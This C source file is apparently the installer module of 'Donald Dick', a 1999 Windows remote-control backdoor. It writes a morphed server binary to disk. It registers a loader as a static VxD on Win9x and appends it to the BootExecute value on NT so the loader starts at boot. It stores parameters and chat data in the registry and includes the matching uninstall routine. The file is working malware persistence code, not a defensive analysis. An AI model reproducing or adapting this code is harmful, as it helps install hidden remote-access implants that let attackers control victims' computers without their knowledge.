/*
  donald dick installation/deinstallation procedures
  written by alexander yaworsky
  '99
*/

//#define TEST

#include <windows.h>

#include "registry.h"
#include "stringlist.h"
#include "paths.h"
#include "installer.h"
#include "sm.h"
#include "resource.h"
#include "stdlib.h"
#include "syslog.h"
#include "switches.h"
#include "toolhelp.h"


static BOOL Win95_InstallDickInRegistry( char* LoaderName )
  {
    HKEY   KeyH, SubkeyH;
    char   KeyName[ MAX_PATH ];
    char   Ldr[ 16 ];
    char   *cp;
    BOOL   Rc;

    SysLog( "Installing Dick loader for Win9X" );
    lstrcpy( KeyName, RegKeyVxD );
    lstrcat( KeyName, Slash );
    lstrcpy( Ldr, LoaderName );
    if( (cp = Strrchr( Ldr, '.' )) != NULL ) *cp = '\0';
    CharUpper( Ldr );
    lstrcat( KeyName, Ldr );
    if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, KeyName,
                      0, KEY_ALL_ACCESS, &SubkeyH ) != ERROR_SUCCESS ) {
      SysLog( "RegOpenKeyEx(%s) failed, error %d, trying to create", KeyName, GetLastError() );
      if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, RegKeyVxD,
                        0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
        SysLog( "RegOpenKeyEx(%s) failed, error %d", RegKeyVxD, GetLastError() );
        return FALSE;
      }
      if( RegCreateKey( KeyH, Ldr, &SubkeyH ) != ERROR_SUCCESS ) {
        SysLog( "RegCreateKeyEx(%s\\%s) failed, error %d", RegKeyVxD, Ldr, GetLastError() );
        RegCloseKey( KeyH );
        return FALSE;
      }
      RegCloseKey( KeyH );
    }
    Rc = FALSE;
    if( RegSetValueEx( SubkeyH, "StaticVxD", 0, REG_SZ,
           (LPBYTE) LoaderName, lstrlen( LoaderName ) + 1 ) != ERROR_SUCCESS )
      SysLog( "RegSetValueEx(StaticVxD) failed, error %d", GetLastError() );
    else
      if( RegSetValueEx( SubkeyH, "Start",
                       0, REG_BINARY, (LPBYTE) "", 1 ) != ERROR_SUCCESS )
        SysLog( "RegSetValueEx(Start) failed, error %d", GetLastError() );
      else
        Rc = TRUE;
    RegCloseKey( SubkeyH );
    return Rc;
  }

static BOOL WinNT_InstallDickInRegistry( char* LoaderName )
  {
    HKEY   KeyH;
    LPBYTE VData;
    DWORD  VType, VSize, Rc;
    BOOL   FreeVData, Ret;
    char   Buf[ MAX_PATH ];
    char*  cp;

    SysLog( "Installing Dick loader for WinNT" );
    if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, RegKeySessMgr,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS ) {
      SysLog( "RegOpenKeyEx(%s) failed, error %d", RegKeySessMgr, GetLastError() );
      return FALSE;
    }
    lstrcpy( Buf, LoaderName );
    if( (cp = Strrchr( Buf, '.' )) != NULL ) *cp = '\0';
    Buf[ lstrlen( Buf ) + 1 ] = '\0';
    Rc = RegQueryValueEx( KeyH, "BootExecute", 0, &VType, NULL, &VSize );
    if( Rc != ERROR_SUCCESS || VSize < 2 ) {
      VData = (LPBYTE) Buf;
      VSize = lstrlen( Buf ) + 2;
      FreeVData = FALSE;
      SysLog( "No bootexec value" );
    }
    else {
      VSize += 4096;
      VData = LocalAlloc( LPTR, VSize );
      FreeVData = TRUE;
      RegQueryValueEx( KeyH, "BootExecute", 0, &VType, VData, &VSize );
      // check presence of our bootexec
      cp = VData;
      if( *(cp + VSize - 1) != '\0' ) { *(cp + VSize) = '\0'; VSize++; }
      if( *(cp + VSize - 2) != '\0' ) { *(cp + VSize) = '\0'; VSize++; }
      while( *cp != '\0' ) {
        if( lstrcmpi( cp, Buf ) == 0 ) break;
        cp += lstrlen( cp ) + 1;
      }
      if( *cp == '\0' ) { // not present - append
        RtlMoveMemory( VData + VSize - 1, Buf, lstrlen( Buf ) + 2 );
        VSize += lstrlen( Buf ) + 1;
        SysLog( "Append %s to bootexec value", Buf );
      }
    }
    Ret = FALSE;
    if( RegSetValueEx( KeyH, "BootExecute",
                       0, VType, VData, VSize ) != ERROR_SUCCESS )
      SysLog( "RegSetValueEx(BootExecute) failed, error %d", GetLastError() );
    else
      Ret = TRUE;
    if( FreeVData ) LocalFree( VData );
    RegCloseKey( KeyH );
    return Ret;
  }

void RequireTermination( char* EName )
  {
    HANDLE    EvtH;

    EvtH = OpenEvent( EVENT_ALL_ACCESS, FALSE, CharUpper( EName ) );
    if( EvtH == 0 ) {
      SysLog( "RequireTermination: OpenEvent( %s ) failed, error %d",
              CharUpper( EName ), GetLastError() );
      return;
    }
    SetEvent( EvtH );
    Sleep( 60 );
    CloseHandle( EvtH );
#   ifdef TEST
      SysLog( "RequireTermination( %s ) done", EName );
#   endif
  }

BOOL InstallDick( char* Server, char* ServerExe, char* W95Server,
                  char* WNTServer, char* Loader, char* VxD,
                  char* Bootexec, char* ACLFileName, char* HomeKey,
                  char* W95HomeKey, char* WNTHomeKey, char* SrvParams,
                  char* ChatData, char* EName,
                  BYTE* Params, DWORD ParamsSz,
                  BYTE* CData, DWORD CDataSz,
                  BYTE* ACLData, DWORD ACLDataSz )
  {
    BOOL      b, Rc;
    HANDLE    Fh;
    char      ServerPath[ MAX_PATH ];
    char      LoaderPath[ MAX_PATH ];
    char      FNames[ 1024 ];
    IDDATA    Ii;

    Rc = FALSE;
    lstrcpy( Ii.ServerFName, Server );
    lstrcpy( Ii.ServerExeFName, ServerExe );
    lstrcpy( Ii.LoaderFName, Loader );
    lstrcpy( Ii.ACLFName, ACLFileName );
    lstrcpy( Ii.RegHomeKey, HomeKey );
    lstrcpy( Ii.RegValParams, SrvParams );
    lstrcpy( Ii.RegValChat, ChatData );
    lstrcpy( Ii.EvtName, EName );

    wsprintf( FNames, "%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n\r\n\r\n",
              Server, W95Server, WNTServer, VxD, Bootexec,
              W95HomeKey, WNTHomeKey, SrvParams, ChatData, EName, ACLFileName );

    GetAnyPath( ServerPath, Server );
    GetAnyPath( LoaderPath, Loader );
    Fh = CreateFile( ServerPath, GENERIC_READ | GENERIC_WRITE,
                     0, NULL, OPEN_ALWAYS, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
      SysLog( "InstallDick: CreateFile( %s ) failed, error %d",
              ServerPath, GetLastError() );
      return FALSE;
    }
    SetEndOfFile( Fh );
    b = SM_MorphServer( Fh, IDF_SERVER, FNames, NULL, NULL );
    CloseHandle( Fh );
    if( ! b ) {
  failure:
      DeleteFile( ServerPath );
      return FALSE;
    }

    GetAnyPath( LoaderPath, Loader );
    if( WindowsNT ) {
      if( ! SM_ExtractBootexec( LoaderPath, Server, IDF_NTLOADER ) )
        goto failure;
      if( ! WinNT_InstallDickInRegistry( Bootexec ) ) {
        DeleteFile( LoaderPath );
        goto failure;
      }
    }
    else {
      if( ! SM_ExtractVxD( LoaderPath, Server, IDF_LOADER ) ) goto failure;
      if( ! Win95_InstallDickInRegistry( VxD ) ) {
        DeleteFile( LoaderPath );
        goto failure;
      }
    }

    if( Params != NULL ) RegWriteRaw( HomeKey, SrvParams, Params, ParamsSz );
    if( CData != NULL ) RegWriteRaw( HomeKey, ChatData, CData, CDataSz );
    RegWriteIdentification( &Ii );
    return TRUE;
  }

static void xDeleteFile( char* Name )
  {
    int   i;

    for( i = 0; i < 5; i++ ) {
      if( DeleteFile( Name ) ) {
        SysLog( "File %s has been removed", Name );
        return;
      }
      if( GetLastError() != ERROR_ACCESS_DENIED ) break;
      Sleep( 300 );
    }
    SysLog( "DeleteFile(%s) failed, error %d", Name, GetLastError() );
  }

static void DoUninstall( IDDATA* Ii, BYTE** Params, DWORD* ParamsSz,
                    BYTE** ChatData, DWORD* ChatDataSz,
                    BYTE** ACLData, DWORD* ACLDataSz )
  {
    HKEY   KeyH;
    LPBYTE VData;
    DWORD  VType, VSize;
    char   LdrName[ MAX_PATH * 2 ];
    char*  cp;
    int    i;
    BYTE   *_Params, *_ChatData;
    DWORD  _ParamsSz, _ChatDataSz;

#   ifdef TEST
      SysLog( "Uninstalling instance: %s %s %s %s %s %s %s %s",
              Ii->ServerFName, Ii->ServerExeFName, Ii->LoaderFName,
              Ii->ACLFName, Ii->RegHomeKey, Ii->RegValParams,
              Ii->RegValChat, Ii->EvtName );
#   endif

    RequireTermination( Ii->EvtName );
    Sleep( 150 );

    // save params

    _Params = RegReadRaw( Ii->RegHomeKey, Ii->RegValParams, &_ParamsSz, 0 );
    _ChatData = RegReadRaw( Ii->RegHomeKey, Ii->RegValChat, &_ChatDataSz, 0 );

    if( _Params != NULL || _ChatData != NULL ) {
      if( Params != NULL ) {
        if( *Params != NULL ) LocalFree( *Params );
        *Params = _Params;
      }
      if( ParamsSz != NULL ) *ParamsSz = _ParamsSz;
      if( ChatData != NULL ) {
        if( *ChatData != NULL ) LocalFree( *ChatData );
        *ChatData = _ChatData;
      }
      if( ChatDataSz != NULL ) *ChatDataSz = _ChatDataSz;
    }

    // remove parameters from home registry key;
    // the key itself is not removed, however

    if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, Ii->RegHomeKey,
                      0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS )
      SysLog( "RegOpenKeyEx(%s) failed, error %d", Ii->RegHomeKey, GetLastError() );
    else {
      RegDeleteValue( KeyH, Ii->RegValParams );
      RegDeleteValue( KeyH, Ii->RegValChat );
      RegCloseKey( KeyH );
    }

    // delete files

    GetAnyPath( LdrName, Ii->ServerFName ); xDeleteFile( LdrName );
    GetAnyPath( LdrName, Ii->ServerExeFName ); xDeleteFile( LdrName );
    GetAnyPath( LdrName, Ii->LoaderFName ); xDeleteFile( LdrName );

    // remove loader from the registry

    lstrcpy( LdrName, Ii->LoaderFName );
    if( (cp = Strrchr( LdrName, '.' )) != NULL ) *cp = '\0';

    if( WindowsNT ) {
      if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, RegKeySessMgr,
                        0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS )
        SysLog( "RegOpenKeyEx(%s) failed, error %d", RegKeySessMgr, GetLastError() );
      else {
        // remove bootexec name
        if( RegQueryValueEx( KeyH, "BootExecute",
                             0, &VType, NULL, &VSize ) != ERROR_SUCCESS )
          SysLog( "RegQueryValueEx(BootExecute) failed, error %d", GetLastError() );
        else {
          VSize += 4096;
          VData = LocalAlloc( LPTR, VSize );
          if( VData == NULL )
            SysLog( "LocalAlloc( LPTR, %d ) failed, error %d", VSize, GetLastError() );
          else {
            RegQueryValueEx( KeyH, "BootExecute", 0, &VType, VData, &VSize );
            // check presence of our bootexec
            cp = VData;
            if( *(cp + VSize - 1) != '\0' ) { *(cp + VSize) = '\0'; VSize++; }
            if( *(cp + VSize - 2) != '\0' ) { *(cp + VSize) = '\0'; VSize++; }
            while( *cp != '\0' ) {
              if( lstrcmpi( cp, LdrName ) == 0 ) break;
              cp += lstrlen( cp ) + 1;
            }
            if( *cp != '\0' ) { // present - remove
              i = lstrlen( cp ) + 1;
              VSize -= i;
              RtlMoveMemory( cp, cp + i, VSize - (cp - VData) );
              SysLog( "%s removed from bootexec value", LdrName );
            }
            RegSetValueEx( KeyH, "BootExecute", 0, VType, VData, VSize );
            LocalFree( VData );
          }
        }
        RegCloseKey( KeyH );
      }
    }
    else {
      if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, RegKeyVxD,
                        0, KEY_ALL_ACCESS, &KeyH ) != ERROR_SUCCESS )
        SysLog( "RegOpenKeyEx(%s) failed, error %d", RegKeyVxD, GetLastError() );
      else {
        RegDeleteKey( KeyH, LdrName );
        RegCloseKey( KeyH );
      }
    }
  }

void UninstallDick( BYTE** Params, DWORD* ParamsSz,
                    BYTE** ChatData, DWORD* ChatDataSz,
                    BYTE** ACLData, DWORD* ACLDataSz )
  {
    IDDATA  *Ii;
    int     i;

    if( Params != NULL ) *Params = NULL;
    if( ParamsSz != NULL ) *ParamsSz = 0;
    if( ChatData != NULL ) *ChatData = NULL;
    if( ChatDataSz != NULL ) *ChatDataSz = 0;
    if( ACLData != NULL ) *ACLData = NULL;
    if( ACLDataSz != NULL ) *ACLDataSz = 0;
    Ii = RegReadIdentification();
    if( Ii == NULL ) return;
    for( i = 0; Ii[ i ].ServerFName[0] != '\0'; i++ )
      DoUninstall( Ii + i, Params, ParamsSz, ChatData, ChatDataSz,
                   ACLData, ACLDataSz );
    RegDeleteIdentification();
    LocalFree( Ii );
  }
